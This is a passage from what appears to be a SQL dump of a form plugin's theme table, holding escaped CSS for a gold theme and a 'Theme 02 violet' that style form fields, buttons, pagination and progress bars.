inline-block;\r\n}\r\n.sel-imul .sel-selected {\r\n	cursor: pointer;\r\n	position: relative;\r\n	display: inline-block;\r\n	border-radius: 4px;\r\n	padding: 2px 0px 2px 2px;\r\n	font-size: 13px;\r\n	height: 22px;\r\n	line-height: 22px;\r\n	overflow: hidden;\r\n	background: #fff;\r\n	border: 0px solid #ccc;\r\n	background-position: right 2px center;\r\n	width: 100%;\r\n}\r\n.sel-imul.act .sel-selected {\r\n	background: #fff;\r\n}\r\n.sel-selected .sel-arraw {\r\n	height: 22px;\r\n	width: 29px;\r\n	background: url([SITE_ROOT]/images/02/01.png) 50% 50% no-repeat;\r\n	position: absolute;\r\n	top: 0px;\r\n	right: 0px;\r\n	padding: 2px;\r\n}\r\n.sel-imul:hover .sel-selected .sel-arraw {\r\n// background-color:#e0e0e0;\r\n// border-left:1px solid #bbb;\r\n}\r\n.sel-imul.act .sel-selected .sel-arraw {\r\n// background-color:#e0e0e0;\r\n// border-left:1px solid #bbb;\r\n}\r\n.sel-imul .sel-options {\r\n	background: #fff;\r\n	border: 1px solid #dbdbdb;\r\n	border-top: none;\r\n	position: absolute;\r\n	width: inherit;\r\n	display: none;\r\n	z-index: 10;\r\n	max-height: 200px;\r\n	overflow-y: auto;\r\n	overflow-x: hidden;\r\n}\r\n.sel-options .sel-option {\r\n	padding: 3px 4px;\r\n	font-size: 13px;\r\n	border: 1px solid #fff;\r\n	border-right: none;\r\n	border-left: none;\r\n	text-align: left;\r\n}\r\n.sel-options .sel-option:hover {\r\n	border-color: #dbdbdb;\r\n	cursor: pointer;\r\n}\r\n.sel-options .sel-option.sel-ed {\r\n	background: #dbdbdb;\r\n	border-color: #dbdbdb;\r\n}\r\ninput[type=text]{\r\n	margin: 0px;\r\n}\r\ninput[type=password]{\r\n	margin: 0px;\r\n}\r\ninput[type=url]{\r\n	margin: 0px;\r\n}\r\ninput[type=email]{\r\n	margin: 0px;\r\n}\r\ninput.text{\r\n	margin: 0px;\r\n}\r\ninput.title{\r\n	margin: 0px;\r\n}\r\ntextarea{\r\n	margin: 0px;\r\n}\r\nselect {\r\n	margin: 0px;\r\n}\r\n.form-error {\r\n	border-color: red !important;\r\n}\r\n.form-error:focus {\r\n	border-color: red !important;\r\n}\r\n\r\n.wdform-field {\r\n	display: table-cell;\r\n	padding: 5px 0px;\r\n}\r\n.wdform-label-section{\r\n	text-align: left;\r\n	display: table-cell;\r\n}\r\n.wdform-element-section {\r\n	text-align: left;\r\n	display: table-cell;\r\n	min-width: 140px;\r\n}\r\n.file-upload input {\r\n	position: absolute;\r\n	visibility: hidden;\r\n}\r\n.file-upload-status {\r\n	margin-left: 10px;\r\n	max-width: 200px;\r\n	font-weight: bold;\r\n	font-size: 16px;\r\n	color: #888;\r\n	background: #fff;\r\n	position: absolute;\r\n	border-radius: 4px;\r\n	height: 24px;\r\n	border: 1px solid #ccc;\r\n	padding-left: 5px;\r\n	padding-right: 5px;\r\n	white-space: nowrap;\r\n	overflow: hidden;\r\n	direction: rtl;\r\n	padding-top: 3px;\r\n	margin-top: 2px;\r\n}\r\n.file-picker {\r\n	width: 41px;\r\n	height: 32px;\r\n	background: url([SITE_ROOT]/images/02/02/upload.png);\r\n	display: inline-block;\r\n}\r\n.next-page div.wdform-page-button {\r\n	color: #4D4A3C;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 36px;\r\n	line-height: 33px;\r\n	background: url([SITE_ROOT]/images/02/next.png) top right #CFAB1A;\r\n	padding: 0px 30px 0 15px;\r\n	vertical-align: middle;\r\n	font-weight: 600;\r\n	font-size: 16px;\r\n}\r\n.next-page div.wdform-page-button:hover {\r\n	background: url([SITE_ROOT]/images/02/next.png) top right  #A08104;\r\n}\r\n.previous-page div.wdform-page-button {\r\n	color: #4D4A3C;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 36px;\r\n	line-height: 36px;\r\n	background: url([SITE_ROOT]/images/02/previous.png) top left #CFAB1A;\r\n	padding: 0px 15px 0 30px;\r\n	vertical-align: middle;\r\n	font-weight: 600;\r\n	font-size: 16px;\r\n}\r\n.previous-page div.wdform-page-button:hover {\r\n	background: url([SITE_ROOT]/images/02/previous.png) top left  #A08104;\r\n}\r\n.button-submit {\r\n	background: url([SITE_ROOT]/images/02/bg.png) #CFAB1A;\r\n	cursor: pointer;\r\n	font-size: 16px;\r\n	border-radius: 0px;\r\n	min-width: 80px;\r\n	min-height: 34px;\r\n	color: #4D4A3C;\r\n	margin: 5px;\r\n	border: 0px;\r\n	font-family: Segoe UI;\r\n	font-weight: 600;\r\n}\r\n.button-reset {\r\n	background: transparent;\r\n	cursor: pointer;\r\n	font-size: 17px;\r\n	min-width: 80px;\r\n	min-height: 34px;\r\n	color: #787878;\r\n	border: 0px;\r\n	margin: 5px;\r\n	font-family: Segoe UI;\r\n	text-decoration: underline;\r\n}\r\n.wdform_page {\r\n	background: #E2DED7;\r\n	padding: 15px 15px 15px 50px;\r\n	border-radius: 0px;\r\n	font-family: Segoe UI;\r\n}\r\n.wdform_column {\r\n	padding-right: 30px !important;\r\n	float: left;\r\n	border-spacing: 2px;\r\n	border-collapse: separate !important;\r\n}\r\n.wdform_column>div {\r\n	border-bottom: 1px solid #CFCFCF;\r\n}\r\n.wdform_column>.wdform_row:last-child {\r\n	border-bottom: 0px solid #E7E7E7;\r\n}\r\n.wdform-field-section-break {\r\n	text-align: center;\r\n}\r\n.wdform_section_break2 {\r\n	margin: 16px 10px 16px 0px;\r\n	display: inline-block;\r\n	background: url([SITE_ROOT]/images/02/bg.png) #CFAB1A;\r\n	text-align: left;\r\n	padding: 10px;\r\n	border-radius: 0px;\r\n	-moz-box-shadow: 7px -9px 20px -5px rgba(0, 0, 0, 0.23), -7px 9px 20px -5px rgba(0, 0, 0, 0.23);\r\n	-webkit-box-shadow: 7px -9px 20px -5px rgba(0, 0, 0, 0.23), -7px 9px 20px -5px rgba(0, 0, 0, 0.23);\r\n	box-shadow: 7px -9px 20px -5px rgba(0, 0, 0, 0.23), -7px 9px 20px -5px rgba(0, 0, 0, 0.23);\r\n	width: 466px;\r\n	text-align: center;\r\nfont-size: 18px;\r\nfont-family: Segoe UI;\r\ncolor: #292929;\r\nfont-weight: 600;\r\n}\r\n\r\n.wdform_section_break\r\n{\r\nmargin: 16px 10px 16px 0px;\r\ntext-align: left;\r\nfont-size: 18px;\r\nfont-family: Segoe UI;\r\ncolor: #292929;\r\n}\r\n.wdform_section {\r\n	display: table-row\r\n}\r\nselect {\r\n	border-radius: 4px;\r\n	height: 26px;\r\n	overflow: hidden;\r\n	border: 0px solid #ccc;\r\n	padding: 2px;\r\n	outline: none;\r\n}\r\ninput[type=\"text\"] {\r\n	border-radius: 4px;\r\n	height: 25px;\r\n	border: 0px solid #ccc;\r\n	padding:0 3px !important;\r\n}\r\ninput[type=\"password\"] {\r\n	border-radius: 4px;\r\n	height: 25px;\r\n	border: 0px solid #ccc;\r\n	padding:0 3px !important;\r\n}\r\ntextarea {\r\n	border-radius: 4px;\r\n	height: 25px;\r\n	border: 0px solid #ccc;\r\n	padding:0 3px !important;\r\n}\r\ninput[type=\"text\"]:focus{\r\n	border-color: #FFB471;\r\n	outline: none;\r\n}\r\ninput[type=\"password\"]:focus{\r\n	border-color: #FFB471;\r\n	outline: none;\r\n}\r\ntextarea:focus{\r\n	border-color: #FFB471;\r\n	outline: none;\r\n}\r\n\r\n.input_deactive {\r\n	color: #999999;\r\n	font-style: italic;\r\n}\r\n.input_active {\r\n	color: #000000;\r\n	font-style: normal;\r\n}\r\n.am_pm_select {\r\n	width: 30px;\r\n	vertical-align: middle;\r\n}\r\n.checkbox-div input[type=checkbox] {\r\n	position : absolute;\r\n	z-index: -1;\r\n}\r\n.checkbox-div {\r\n	width: 13px;\r\n	height: 12px;\r\n	background: transparent;\r\n	border: 1px solid #A7A7A7;\r\n	border-radius: 0px;\r\n	position: relative;\r\n	display: inline-block;\r\n}\r\n.checkbox-div label {\r\n	cursor: pointer;\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=0)\";\r\n	filter: alpha(opacity=0);\r\n	opacity: 0;\r\n	content: \"\";\r\n	position: absolute;\r\n	width: 16px;\r\n	height: 13px;\r\n	background: url([SITE_ROOT]/images/02/checkbox.png);\r\n	border-radius: 0px;\r\n	top: -3px;\r\n	left: 1px;\r\n}\r\n.checkbox-div label:hover {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=30)\";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.checkbox-div .wdform-ch-rad-label:hover {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=30)\";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.wdform-ch-rad-label:hover + .checkbox-div label {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=30)\";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.checkbox-div input[type=checkbox]:checked + label {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=100)\";\r\n	filter: alpha(opacity=100);\r\n	opacity: 1;\r\n}\r\n.wdform-calendar-button,\r\n.wdform-calendar-button:hover {\r\n  display:inline-block;\r\n	background: transparent url([SITE_ROOT]/images/02/02/date.png) no-repeat left 50% !important;\r\n	border: 0px;\r\n	color: transparent;\r\n	width: 22px;\r\n	height: 24px;\r\n	position: relative;\r\n	left: -22px;\r\n	vertical-align: top;\r\n}\r\n.wdform-calendar-button:focus {\r\n outline:none; \r\n}\r\n.radio-div input[type=radio] {\r\n	position : absolute;\r\n	z-index: -1;\r\n}\r\n.forlabs {\r\n	float: right;\r\n	margin-right: 20px;\r\n}\r\n.radio-div {\r\n	width: 13px;\r\n	height: 12px;\r\n	background: transparent;\r\n	border: 1px solid #A7A7A7;\r\n	border-radius: 0px;\r\n	position: relative;\r\n	display: inline-block;\r\n	top: 2px;\r\n}\r\n.radio-div label {\r\n	cursor: pointer;\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=0)\";\r\n	filter: alpha(opacity=0);\r\n	opacity: 0;\r\n	content: \"\";\r\n	position: absolute;\r\n	width: 11px;\r\n	height: 10px;\r\n	background: #A7A7A7;\r\n	border-radius: 0px;\r\n	top: 1px;\r\n	left: 1px;\r\n}\r\n.radio-div label:hover {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=30)\";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.radio-div .wdform-ch-rad-label:hover {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=30)\";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.wdform-ch-rad-label:hover + .radio-div label {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=30)\";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.radio-div input[type=radio]:checked + label {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=100)\";\r\n	filter: alpha(opacity=100);\r\n	opacity: 1;\r\n}\r\n.if-ie-div-label {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=100)\" !important;\r\n	filter: alpha(opacity=100) !important;\r\n	opacity: 1 !important;\r\n}\r\n.wdform-ch-rad-label {\r\n	display: inline;\r\n	margin: -4px 5px 5px 5px;\r\n	float: left;\r\n	color: #000;\r\n	cursor: pointer\r\n}\r\ntextarea {\r\n	padding-top: 5px;\r\n}\r\n.wdform-date {\r\n  display:inline-block;\r\n	width: 105px\r\n}\r\n.wdform_footer {\r\n	padding-top: 5px;\r\n	margin-top: 15px;\r\n}\r\n.page-numbers {\r\n	vertical-align: middle;\r\n}\r\n.time_box {\r\n	text-align: right;\r\n	width: 30px;\r\n	vertical-align: middle\r\n}\r\n.mini_label {\r\n	font-size: 10px;\r\n	font-family: \"Lucida Grande\", Tahoma, Arial, Verdana, sans-serif;\r\n	color: #000;\r\n}\r\n.wdform-label {\r\n	border: none;\r\n	color: #000;\r\n	vertical-align: top;\r\n	line-height: 17px;\r\n}\r\n.wdform_colon {\r\n	color: #000\r\n}\r\n.wdform_separator {\r\n	font-style: bold;\r\n	vertical-align: middle;\r\n	color: #000;\r\n}\r\n.wdform_line {\r\n	color: #000\r\n}\r\n.wdform-required {\r\n	border: none;\r\n	color: rgb(158, 0, 0);\r\n	vertical-align: top;\r\n}\r\n.captcha_img {\r\n	border-width: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	cursor: pointer;\r\n	border-radius: 4px;\r\n}\r\n.captcha_refresh {\r\n	width: 30px;\r\n	height: 30px;\r\n	border-width: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	vertical-align: middle;\r\n	cursor: pointer;\r\n	background-image: url([SITE_ROOT]/images/refresh_black.png);\r\n}\r\n.captcha_input {\r\n	height: 20px;\r\n	border-width: 1px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	vertical-align: middle;\r\n}\r\n.file_upload {\r\n	border: 0px solid white;\r\n	border-radius: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	color: black;\r\n	background-color: white;\r\n}\r\n.page_deactive {\r\n	font-size: 12px;\r\n color: #3F3927;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 20px;\r\n	text-align: center;\r\n	vertical-align: bottom;\r\n	padding-top: 5px;\r\n	padding: 5px 30px 0px 30px;\r\n	font-weight: bold;\r\n}\r\n.page_deactive:nth-child(even) {\r\n	background-color: #DCDADB;\r\n}\r\n.page_deactive:nth-child(odd) {\r\n	background-color: #D1CDCE;\r\n}\r\n.page_active {\r\n	color: #3F3927;\r\n	cursor: pointer;\r\n	background-color: #ECBD00;\r\n	display: inline-block;\r\n	vertical-align: bottom;\r\n	height: 25px;\r\n	text-align: center;\r\n	font-size: 18px;\r\n	padding: 5px 30px 0px 30px;\r\n}\r\n.page_percentage_active {\r\n	padding: 0px;\r\n	margin: 0px;\r\n	border-spacing: 0px;\r\n	height: 17px;\r\n	line-height: 17px;\r\n	font-size: 15px;\r\n	float: left;\r\n	text-align: right !important;\r\n	z-index: 1;\r\n	position: relative;\r\n	background: #ECBD00 ; /* Old browsers */\r\n	background: -moz-linear-gradient(left, #ECBD00 0%, #F5C403 49%, #F8C90B 84%, #FFCC00 99%); /* FF3.6+ */\r\n	background: -webkit-gradient(linear, left top, right top, color-stop(0%, #ECBD00 ), color-stop(49%, #F5C403 ), color-stop(84%, #F8C90B ), color-stop(99%, #FFCC00 )); /* Chrome,Safari4+ */\r\n	background: -webkit-linear-gradient(left, #ECBD00 0%, #F5C403 49%, #F8C90B 84%, #FFCC00 99%); /* Chrome10+,Safari5.1+ */\r\n	background: -o-linear-gradient(left, #ECBD00 0%, #F5C403 49%, #F8C90B 84%, #FFCC00 99%); /* Opera 11.10+ */\r\n	background: -ms-linear-gradient(left, #ECBD00 0%, #F5C403 49%, #F8C90B 84%, #FFCC00 99%); /* IE10+ */\r\n	background: linear-gradient(to right, #ECBD00 0%, #F5C403 49%, #F8C90B 84%, #FFCC00 99%); /* W3C */\r\n	vertical-align: middle;\r\n}\r\n.page_percentage_deactive {\r\n	height: 17px;\r\n	line-height: 17px;\r\n	background-color: #D9D7D8;\r\n	text-align: left !important;\r\n	margin-bottom: 1px;\r\n}\r\n.page_numbers {\r\n	font-size: 14px;\r\n	color: #000;\r\n}\r\n.phone_area_code {\r\n	width: 50px;\r\n}\r\n.phone_number {\r\n	width: 100px;\r\n}\r\nbutton {\r\n	cursor: pointer;\r\n}\r\n.other_input {\r\n	border-radius: 0px;\r\n	border-width: 1px;\r\n	height: 16px;\r\n	font-size: 12px;\r\n	padding: 1px;\r\n	margin: 1px;\r\n	margin-left: 25px;\r\n	z-index: 100;\r\n	position: absolute;\r\n}\r\n.wdform_page_navigation {\r\n	text-align: right !important;\r\n	margin-bottom: -2px;\r\n}\r\n.wdform_percentage_text {\r\n	margin: 3px 5px 3px 9px;\r\n	color: #292929;\r\n	font-weight: bold;\r\nfont-size:13px;\r\n}\r\n.wdform_percentage_title {\r\n	color: #000000;\r\n	font-style: italic;\r\n	margin: 0px 0px 0px 40px;\r\n	display: inline-block;\r\n	line-height: 17px;\r\n	height: 17px;\r\n	vertical-align: middle;\r\n}\r\n.wdform_button button {\r\n	background: #0E4D92;\r\n	cursor: pointer;\r\n	font-size: 17px;\r\n	border-radius: 4px;\r\n	min-width: 80px;\r\n	min-height: 27px;\r\n	color: #fff;\r\n	border: 2px solid #0E3F77;\r\n	margin: 5px;\r\n	box-shadow: 0px 0px 2px #c9c9c9;\r\n	font-family: Segoe UI;\r\n}\r\n.wdform_button button:active {\r\n	border: 2px solid #0B2D52;\r\n	background: #0E3F77;\r\n}',0),(7,'Theme 02 violet','v.wdform-page-and-images .other_input\r\n{\r\nmax-width: none;\r\n}\r\nbutton,\r\ninput,\r\nselect,\r\ntextarea\r\n{\r\nfont-size:14px;\r\n}\r\n.warning,\r\n.error\r\n{\r\nbackground-color: #C9ADEF;\r\nborder: 1px solid #E3E2E4;\r\nmargin-bottom: 10px;\r\ncolor: #E3E2E4;\r\npadding: 5px;\r\n}\r\n.warning *,\r\n.error *\r\n{\r\nmargin:0;\r\n}\r\n.recaptcha_input_area input\r\n{\r\nheight:initial !important;\r\n}\r\n.wdform_grading input {\r\n	width: 100px;\r\n}\r\n.ui-slider {\r\n	height: 6px;\r\n	background: #fff !important;\r\n	margin: 7px 0px;\r\n}\r\na.ui-slider-handle {\r\n	border-radius: 10px;\r\n	border: 2px solid #fff;\r\n	background: #A4A4A4;\r\n}\r\n.ui-slider-range {\r\n	background: #A4A4A4 !important;\r\n}\r\n.ui-slider-horizontal .ui-slider-handle {\r\n	top: -8px !important;\r\n}\r\na.ui-slider-handle {\r\n	border-radius: 10px;\r\n	border: 2px solid #fff;\r\n	background: #A4A4A4;\r\n}\r\n.wdform-matrix-cell input[type=\"text\"] {\r\n	width: 100px;\r\n}\r\n.wdform-matrix-cell select {\r\n	width: 60px;\r\n}\r\n.wdform_section .wdform_column:last-child {\r\n	padding-right: 0px !important;\r\n}\r\n.wdform_preload {\r\n	display: none;\r\n	content: url([SITE_ROOT]/images/02/bg.png);\r\n}\r\n.wdform_grading {\r\n	padding: 3px 0px;\r\n}\r\n.wdform-matrix-table {\r\n	display: table;\r\n	border-spacing: 0px;\r\n}\r\n.wdform-matrix-column {\r\n	text-align: left;\r\n	display: table-cell;\r\n}\r\n.wdform-matrix-cell {\r\n	text-align: center;\r\n	display: table-cell;\r\n	padding: 6px 10px;\r\n}\r\n.wdform-matrix-head>div {\r\n	display: table-cell;\r\n	text-align: center;\r\n}\r\n.wdform-matrix-head {\r\n	display: table-row;\r\n}\r\n.wdform-matrix-row0 {\r\n	background: #DFDFDF;\r\n	display: table-row;\r\n}\r\n.wdform-matrix-row1 {\r\n	background: #E9E9E9;\r\n	display: table-row;\r\n}\r\n.selected-text {\r\n	text-align: left;\r\n}\r\n.wdform-quantity {\r\n	width: 30px;\r\n	margin: 2px 0px;\r\n}\r\n.wdform_scale_rating label {\r\n	vertical-align: middle;\r\n}\r\n.ui-corner-all {\r\n	border-radius: 3px;\r\n}\r\n.ui-widget-content {\r\n	border: 0px;\r\n	background: transparent;\r\n}\r\na.ui-spinner-button:hover{\r\n	background: #5C00DA !important;\r\n	color: #fff;\r\n	outline: none;\r\n}\r\na.ui-spinner-button:active{\r\n	background: #5C00DA !important;\r\n	color: #fff;\r\n	outline: none;\r\n}\r\na.ui-spinner-button:focus{\r\n	background: #5C00DA !important;\r\n	color: #fff;\r\n	outline: none;\r\n}\r\na.ui-slider-handle:hover{\r\n	background: #5C00DA !important;\r\n	color: #fff;\r\n	outline: none;\r\n}\r\na.ui-slider-handle:active{\r\n	background: #5C00DA !important;\r\n	color: #fff;\r\n	outline: none;\r\n}\r\na.ui-slider-handle:focus{\r\n	background: #5C00DA !important;\r\n	color: #fff;\r\n	outline: none;\r\n}\r\nui-state-hover {\r\n	background: #5C00DA !important;\r\n	color: #fff;\r\n	outline: none;\r\n}\r\nui-slider {\r\n	background: #fff !important;\r\n}\r\n.ui-state-default{\r\n	border: 1px solid #d3d3d3;\r\n	background: #DFDDDD;\r\n	font-weight: normal;\r\n	color: #555555;\r\n}\r\n.ui-widget-content .ui-state-default{\r\n	border: 1px solid #d3d3d3;\r\n	background: #DFDDDD;\r\n	font-weight: normal;\r\n	color: #555555;\r\n}\r\n.ui-widget-header .ui-state-default {\r\n	border: 1px solid #d3d3d3;\r\n	background: #DFDDDD;\r\n	font-weight: normal;\r\n	color: #555555;\r\n}\r\n.ui-slider-range {\r\n	background: #ccc !important;\r\n}\r\n.wdform_map {\r\n	border: 6px solid #DCDCDC;\r\n}\r\n.wdform-page-and-images {\r\n	width: 100%;\r\n	border: 0px !important;\r\n}\r\n.paypal-property {\r\n	display: inline-block;\r\n	margin-right: 15px;\r\n	vertical-align: middle;\r\n}\r\n.sel-wrap {\r\n	display: inline-block;\r\n	vertical-align: middle;\r\n	width:100%;\r\n}\r\n.sel-wrap select {\r\n	position: absolute;\r\n z-index:-1;\r\n width: 0px !important;\r\n}\r\n.sel-imul {\r\n	display: inline-block;\r\n}\r\n.sel-imul .sel-selected {\r\n	cursor: pointer;\r\n	position: relative;\r\n	display: inline-block;\r\n	border-radius: 4px;\r\n	padding: 2px 0px 2px 2px;\r\n	font-size: 13px;\r\n	height: 22px;\r\n	line-height: 22px;\r\n	overflow: hidden;\r\n	background: #fff;\r\n	border: 0px solid #ccc;\r\n	background-position: right 2px center;\r\n	width: 100%;\r\n}\r\n.sel-imul.act .sel-selected {\r\n	background: #fff;\r\n}\r\n.sel-selected .sel-arraw {\r\n	height: 22px;\r\n	width: 29px;\r\n	background: url([SITE_ROOT]/images/02/01.png) 50% 50% no-repeat;\r\n	position: absolute;\r\n	top: 0px;\r\n	right: 0px;\r\n	padding: 2px;\r\n}\r\n.sel-imul:hover .sel-selected .sel-arraw {\r\n// background-color:#e0e0e0;\r\n// border-left:1px solid #bbb;\r\n}\r\n.sel-imul.act .sel-selected .sel-arraw {\r\n// background-color:#e0e0e0;\r\n// border-left:1px solid #bbb;\r\n}\r\n.sel-imul .sel-options {\r\n	background: #fff;\r\n	border: 1px solid #dbdbdb;\r\n	border-top: none;\r\n	position: absolute;\r\n	width: inherit;\r\n	display: none;\r\n	z-index: 10;\r\n	max-height: 200px;\r\n	overflow-y: auto;\r\n	overflow-x: hidden;\r\n}\r\n.sel-options .sel-option {\r\n	padding: 3px 4px;\r\n	font-size: 13px;\r\n	border: 1px solid #fff;\r\n	border-right: none;\r\n	border-left: none;\r\n	text-align: left;\r\n}\r\n.sel-options .sel-option:hover {\r\n	border-color: #dbdbdb;\r\n	cursor: pointer;\r\n}\r\n.sel-options .sel-option.sel-ed {\r\n	background: #dbdbdb;\r\n	border-color: #dbdbdb;\r\n}\r\ninput[type=text]{\r\n	margin: 0px;\r\n}\r\ninput[type=password]{\r\n	margin: 0px;\r\n}\r\ninput[type=url]{\r\n	margin: 0px;\r\n}\r\ninput[type=email]{\r\n	margin: 0px;\r\n}\r\ninput.text{\r\n	margin: 0px;\r\n}\r\ninput.title{\r\n	margin: 0px;\r\n}\r\ntextarea{\r\n	margin: 0px;\r\n}\r\nselect {\r\n	margin: 0px;\r\n}\r\n.form-error {\r\n	border-color: red !important;\r\n}\r\n.form-error:focus {\r\n	border-color: red !important;\r\n}\r\n\r\n.wdform-field {\r\n	display: table-cell;\r\n	padding: 5px 0px;\r\n}\r\n.wdform-label-section{\r\n	text-align: left;\r\n	display: table-cell;\r\n}\r\n.wdform-element-section {\r\n	text-align: left;\r\n	display: table-cell;\r\n	min-width: 140px;\r\n}\r\n.file-upload input {\r\n	position: absolute;\r\n	visibility: hidden;\r\n}\r\n.file-upload-status {\r\n	margin-left: 10px;\r\n	max-width: 200px;\r\n	font-weight: bold;\r\n	font-size: 16px;\r\n	color: #888;\r\n	background: #fff;\r\n	position: absolute;\r\n	border-radius: 4px;\r\n	height: 24px;\r\n	border: 1px solid #ccc;\r\n	padding-left: 5px;\r\n	padding-right: 5px;\r\n	white-space: nowrap;\r\n	overflow: hidden;\r\n	direction: rtl;\r\n	padding-top: 3px;\r\n	margin-top: 2px;\r\n}\r\n.file-picker {\r\n	width: 41px;\r\n	height: 32px;\r\n	background: url([SITE_ROOT]/images/02/02/upload.png);\r\n	display: inline-block;\r\n}\r\n.next-page div.wdform-page-button {\r\n	color: #4D4A3C;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 36px;\r\n	line-height: 33px;\r\n	background: url([SITE_ROOT]/images/02/next.png) top right #5C00DA;\r\n	padding: 0px 30px 0 15px;\r\n	vertical-align: middle;\r\n	font-weight: 600;\r\n	font-size: 16px;\r\n}\r\n.next-page div.wdform-page-button:hover {\r\n	background: url([SITE_ROOT]/images/02/next.png) top right #3D0886;\r\n}.previous-page div.wdform-page-button {\r\n	color: #4D4A3C;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 36px;\r\n	line-height: 36px;\r\n	background: url([SITE_ROOT]/images/02/previous.png) top left #5C00DA;\r\n	padding: 0px 15px 0 30px;\r\n	vertical-align: middle;\r\n	font-weight: 600;\r\n	font-size: 16px;\r\n}\r\n.previous-page div.wdform-page-button:hover {\r\n	background: url([SITE_ROOT]/images/02/previous.png)  top left #3D0886;\r\n}\r\n.button-submit {\r\n	background: url([SITE_ROOT]/images/02/bg.png) #5C00DA;\r\n	cursor: pointer;\r\n	font-size: 16px;\r\n	border-radius: 0px;\r\n	min-width: 80px;\r\n	min-height: 34px;\r\n	color: #4D4A3C;\r\n	margin: 5px;\r\n	border: 0px;\r\n	font-family: Segoe UI;\r\n	font-weight: 600;\r\n}\r\n.button-reset {\r\n	background: transparent;\r\n	cursor: pointer;\r\n	font-size: 17px;\r\n	min-width: 80px;\r\n	min-height: 34px;\r\n	color: #787878;\r\n	border: 0px;\r\n	margin: 5px;\r\n	font-family: Segoe UI;\r\n	text-decoration: underline;\r\n}\r\n.wdform_page {\r\n	background: #E3E2E4;\r\n	padding: 15px 15px 15px 50px;\r\n	border-radius: 0px;\r\n	font-family: Segoe UI;\r\n}\r\n.wdform_column {\r\n	padding-right: 30px !important;\r\n	float: left;\r\n	border-spacing: 2px;\r\n	border-collapse: separate !important;\r\n}\r\n.wdform_column>div {\r\n	border-bottom: 1px solid #CFCFCF;\r\n}\r\n.wdform_column>.wdform_row:last-child {\r\n	border-bottom: 0px solid #E7E7E7;\r\n}\r\n.wdform-field-section-break {\r\n	text-align: center;\r\n}\r\n.wdform_section_break2 {\r\n	margin: 16px 10px 16px 0px;\r\n	display: inline-block;\r\n	background: url([SITE_ROOT]/images/02/bg.png) #5C00DA;\r\n	text-align: left;\r\n	padding: 10px;\r\n	border-radius: 0px;\r\n	-moz-box-shadow: 7px -9px 20px -5px rgba(0, 0, 0, 0.23), -7px 9px 20px -5px rgba(0, 0, 0, 0.23);\r\n	-webkit-box-shadow: 7px -9px 20px -5px rgba(0, 0, 0, 0.23), -7px 9px 20px -5px rgba(0, 0, 0, 0.23);\r\n	box-shadow: 7px -9px 20px -5px rgba(0, 0, 0, 0.23), -7px 9px 20px -5px rgba(0, 0, 0, 0.23);\r\n	width: 466px;\r\n	text-align: center;\r\nfont-size: 18px;\r\nfont-family: Segoe UI;\r\ncolor: #292929;\r\nfont-weight: 600;\r\n}\r\n\r\n.wdform_section_break\r\n{\r\nmargin: 16px 10px 16px 0px;\r\ntext-align: left;\r\nfont-size: 18px;\r\nfont-family: Segoe UI;\r\ncolor: #292929;\r\n}\r\n.wdform_section {\r\n	display: table-row\r\n}\r\nselect {\r\n	border-radius: 4px;\r\n	height: 26px;\r\n	overflow: hidden;\r\n	border: 0px solid #ccc;\r\n	padding: 2px;\r\n	outline: none;\r\n}\r\ninput[type=\"text\"] {\r\n	border-radius: 4px;\r\n	height: 25px;\r\n	border: 0px solid #ccc;\r\n	padding:0 3px !important;\r\n}\r\ninput[type=\"password\"] {\r\n	border-radius: 4px;\r\n	height: 25px;\r\n	border: 0px solid #ccc;\r\n	padding:0 3px !important;\r\n}\r\ntextarea {\r\n	border-radius: 4px;\r\n	height: 25px;\r\n	border: 0px solid #ccc;\r\n	padding:0 3px !important;\r\n}\r\ninput[type=\"text\"]:focus{\r\n	border-color: #FFB471;\r\n	outline: none;\r\n}\r\ninput[type=\"password\"]:focus{\r\n	border-color: #FFB471;\r\n	outline: none;\r\n}\r\ntextarea:focus{\r\n	border-color: #FFB471;\r\n	outline: none;\r\n}\r\n\r\n.input_deactive {\r\n	color: #999999;\r\n	font-style: italic;\r\n}\r\n.input_active {\r\n	color: #000000;\r\n	font-style: normal;\r\n}\r\n.am_pm_select {\r\n	width: 30px;\r\n	vertical-align: middle;\r\n}\r\n.checkbox-div input[type=checkbox] {\r\n	position : absolute;\r\n	z-index: -1;\r\n}\r\n.checkbox-div {\r\n	width: 13px;\r\n	height: 12px;\r\n	background: transparent;\r\n	border: 1px solid #A7A7A7;\r\n	border-radius: 0px;\r\n	position: relative;\r\n	display: inline-block;\r\n}\r\n.checkbox-div label {\r\n	cursor: pointer;\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=0)\";\r\n	filter: alpha(opacity=0);\r\n	opacity: 0;\r\n	content: \"\";\r\n	position: absolute;\r\n	width: 16px;\r\n	height: 13px;\r\n	background: url([SITE_ROOT]/images/02/checkbox.png);\r\n	border-radius: 0px;\r\n	top: -3px;\r\n	left: 1px;\r\n}\r\n.checkbox-div label:hover 